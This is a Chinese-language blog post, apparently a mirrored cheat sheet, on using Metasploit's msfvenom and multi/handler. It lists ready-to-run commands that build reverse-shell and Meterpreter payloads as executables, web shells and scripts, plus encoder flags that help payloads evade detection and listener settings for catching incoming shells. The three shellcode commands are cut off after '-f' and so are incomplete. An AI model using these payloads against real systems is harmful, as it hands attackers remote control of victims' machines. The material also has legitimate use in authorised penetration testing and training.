zoukankan      html  css  js  c++  java
  • msfconsole基础使用,简洁高效学习版

    Msfpayload 模块通常是 Metasploit 最有用的(对初学者来说也是被低估的)能力之一。我们可以使用这个模块创建多个有效载荷,并且利用它在几乎任何情况下都能得到一个shell。

    对于每一个载荷(Payload),我们都可以在 msfconsole 中先执行 use exploit/multi/handler,然后使用 set payload 载荷类型 来设置相应的载荷,用 set LHOST IP地址 来设置监听的本地IP地址,用 set LPORT 端口 来设置监听的端口,用 show options 来查看一下并设置好其他必要参数,最后执行 set ExitOnSession false 使后台端口一直处于监听状态,最后执行 exploit -j -z 然后等待目标载荷运行即可。

    查看使用帮助

    msfvenom -h

    生成二进制版

    • Linux 版 Payload

      msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f elf > shell.elf

    • Windows 版 Payload

      msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f exe > shell.exe

    • MAC 版 Payload

      msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f macho > shell.macho

    生成WEB版

    • PHP 版 Payload

      msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f raw > shell.php
      cat shell.php | pbcopy && echo '<?php ' | tr -d ' ' > shell.php && pbpaste >> shell.php

    • ASP 版 Payload

      msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f asp > shell.asp

    • JSP 版 Payload

      msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f raw > shell.jsp

    • WAR 版 Payload

      msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f war > shell.war

    生成脚本版

    • Python 版 Payload

      msfvenom -p cmd/unix/reverse_python LHOST=<Your IP> LPORT=<Your Port> -f raw > shell.py

    • Bash 版 Payload

      msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP> LPORT=<Your Port> -f raw > shell.sh

    • Perl 版 Payload

      msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP> LPORT=<Your Port> -f raw > shell.pl

    生成shellcode版

    • Linux Shellcode 版 Payload

      msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f

    • Windows Shellcode 版 Payload

      msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f

    • Mac Shellcode 版 Payload

      msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f

    增加编码

    • -e x86/shikata_ga_nai -i 3

    以上使用的仅为反弹TCP连接的载荷,其他载荷可以通过执行msfvenom -l payloads命令查看。
    查看所有支持的Payload格式可以通过msfvenom --list formats命令查看。
    查看所有编码格式通过msfvenom -l encoders命令查看。


    启动监听处理:

    set PAYLOAD <PAYLOAD>
    set LHOST <IP>
    set LPORT <PORT>
    set ExitOnSession false
    exploit -j -z



    原文出处:https://zijieke.com/d/146
  • 相关阅读:
    第一周作业
    第八周作业
    第七周作业
    第五周作业
    第四周作业
    第三周作业
    第二周作业(markdown版本)
    第一周作业
    第六次作业
    第五周作业
  • 原文地址:https://www.cnblogs.com/Gouwa/p/12574975.html
Copyright © 2011-2022 走看看